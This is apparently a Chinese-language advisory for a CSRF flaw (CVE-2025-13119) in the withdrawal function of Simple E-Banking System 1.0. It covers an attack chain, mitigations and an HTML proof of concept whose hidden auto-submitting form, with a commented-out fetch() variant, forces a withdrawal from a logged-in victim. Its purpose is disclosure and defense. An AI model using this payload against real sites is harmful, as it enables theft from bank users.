CVE-2025-13119 Simple E-Banking System CSRF强制取款漏洞

漏洞信息

漏洞编号

CVE-2025-13119

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Fabian Ros/SourceCodester Simple E-Banking System 1.0

漏洞概述

CVE-2025-13119是Fabian Ros开发的SourceCodester Simple E-Banking System 1.0中发现的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于系统的未知功能部分，攻击者可以通过构造恶意请求，诱导已登录用户在不知情的情况下执行非预期的操作，包括强制取款（Forced Withdrawal）。由于该漏洞无需认证即可发起攻击（PR:N），且可以通过网络远程利用（AV:N），攻击者只需诱骗用户访问恶意页面或点击恶意链接即可触发漏洞。CVSS评分4.3，属于中危级别，对系统完整性和机密性有一定影响（I:L/C:L），但可用性未受影响（A:N）。该漏洞已公开披露，相关的利用代码和研究报告可在GitHub上获取，厂商尚未发布官方修复补丁，建议使用者及时采取防护措施。

技术细节

该CSRF漏洞存在于Simple E-Banking System 1.0的取款功能中，系统未对用户请求实施有效的CSRF令牌验证机制。攻击者可以利用此漏洞构造一个自动提交的表单，在用户已登录系统的情况下，通过社交工程手段诱骗用户访问恶意页面或点击恶意链接。攻击流程如下：攻击者首先创建一个包含取款请求参数的HTML页面，该页面会自动向银行系统的取款接口发送POST请求。由于浏览器会自动携带用户的会话Cookie，且系统未验证请求的来源合法性，服务器会认为这是用户的合法操作并执行取款操作。漏洞的关键在于系统缺少：1）Anti-CSRF Token验证；2）Referer头验证；3）自定义请求头验证。攻击者可以利用iframe、script标签或自动提交表单等方式隐藏攻击行为，使用户在不知情的情况下完成取款操作。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统为Simple E-Banking System 1.0，通过代码审计或测试确定取款功能存在CSRF漏洞

STEP 2

步骤2

构造恶意页面：攻击者创建包含自动提交表单或脚本的HTML页面，表单参数指向系统的取款接口

STEP 3

步骤3

社工传播：攻击者通过钓鱼邮件、恶意链接或社交工程手段诱导已登录用户访问恶意页面

STEP 4

步骤4

触发请求：用户浏览器加载恶意页面后，自动向目标系统发送POST取款请求，并携带用户会话Cookie

STEP 5

步骤5

漏洞利用：服务器因缺少CSRF验证机制，认为请求来自合法用户，执行取款操作

STEP 6

步骤6

资金损失：指定金额从用户账户转出，造成经济损失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-13119: Simple E-Banking System Forced Withdrawal -->
<!-- This PoC demonstrates the CSRF vulnerability in the withdrawal function -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Attack PoC - CVE-2025-13119</title>
</head>
<body>
    <h2>CSRF PoC for Simple E-Banking System</h2>
    <p>If you see this page, the attack was successful.</p>
    
    <!-- Auto-submit form that triggers the forced withdrawal -->
    <form id="csrfForm" action="http://target-site.com/withdrawal.php" method="POST" style="display:none;">
        <!-- Replace with actual parameter names from the vulnerable application -->
        <input type="hidden" name="account_number" value="VICTIM_ACCOUNT">
        <input type="hidden" name="amount" value="999999">
        <input type="hidden" name="withdrawal_type" value="forced">
        <input type="hidden" name="submit" value="Submit">
    </form>
    
    <script>
        // Auto-submit the form when page loads
        document.getElementById('csrfForm').submit();
    </script>
    
    <!-- Alternative: Using fetch API for more stealthy attack -->
    <!--
    <script>
        fetch('http://target-site.com/withdrawal.php', {
            method: 'POST',
            mode: 'no-cors',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
            },
            body: 'account_number=VICTIM_ACCOUNT&amount=999999&withdrawal_type=forced&submit=Submit'
        }).then(() => {
            console.log('CSRF attack executed');
        });
    </script>
    -->
</body>
</html>

<!-- 
Attack Scenario:
1. Attacker crafts this malicious HTML page
2. Victim must be logged into Simple E-Banking System
3. Victim visits or is redirected to this page
4. Browser automatically sends the request with victim's cookies
5. Server processes the withdrawal request without CSRF validation
6. Funds are transferred to attacker's specified account

Mitigation:
1. Implement Anti-CSRF tokens in all state-changing operations
2. Verify Referer header for requests
3. Use SameSite=Strict or SameSite=Lax cookies
4. Implement re-authentication for sensitive operations
-->

影响范围

SourceCodester Simple E-Banking System 1.0

防御指南

临时缓解措施

在厂商发布官方修复补丁之前，建议采取以下临时缓解措施：1）禁用系统的取款功能或将其设置为需要人工审核；2）实施IP白名单或地理位置限制；3）启用双因素认证；4）增加交易金额阈值告警；5）定期检查系统日志和账户交易记录；6）使用Web应用防火墙（WAF）规则检测和阻止CSRF攻击特征；7）对用户进行安全意识培训，警惕陌生链接和钓鱼页面；8）考虑暂时停止使用该系统，等待官方修复方案发布。